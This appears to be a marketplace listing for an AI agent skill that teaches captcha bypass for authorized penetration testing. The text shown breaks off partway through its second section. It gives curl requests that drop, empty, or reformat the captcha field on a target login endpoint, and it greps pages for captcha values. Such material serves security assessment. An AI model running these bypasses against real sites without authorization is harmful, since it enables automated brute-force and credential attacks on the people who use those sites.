captcha-bypasslisted

Techniques for bypassing captchas during authorized security testing and penetration testing. Use this skill whenever you're testing web applications and encounter captcha challenges that need to be automated or bypassed for testing purposes. This includes penetration testing, security assessments, and authorized vulnerability scanning. Don't use this for unauthorized access or malicious purposes.
abelrguezr/hacktricks-skills · ★ 13 · Testing & QA · score 65

Install: claude install-skill abelrguezr/hacktricks-skills

# Captcha Bypass Techniques This skill provides techniques for bypassing captchas during **authorized security testing**. The goal is to streamline testing workflows, not to undermine security controls in production without authorization. ## When to Use This Skill Use this skill when: - You're conducting authorized penetration testing on web applications - You need to automate security testing workflows that encounter captchas - You're building security testing tools that need to handle captcha challenges - You're assessing captcha implementation strength in a controlled environment ## Core Techniques ### 1. Parameter Manipulation Try modifying how the captcha parameter is sent: **Omit the captcha parameter entirely:** ```bash # Remove captcha field from request curl -X POST https://target.com/login \ -d "username=test&password=secret" ``` **Change HTTP method:** ```bash # Try GET instead of POST curl -X GET "https://target.com/login?username=test&password=secret" ``` **Switch data format:** ```bash # Try JSON instead of form data curl -X POST https://target.com/login \ -H "Content-Type: application/json" \ -d '{"username":"test","password":"secret"}' ``` **Send empty captcha value:** ```bash curl -X POST https://target.com/login \ -d "username=test&password=secret&captcha=" ``` ### 2. Value Extraction and Reuse **Search page source for captcha values:** ```bash curl -s https://target.com/login | grep -i captcha curl -s https://target.com/login | grep -oE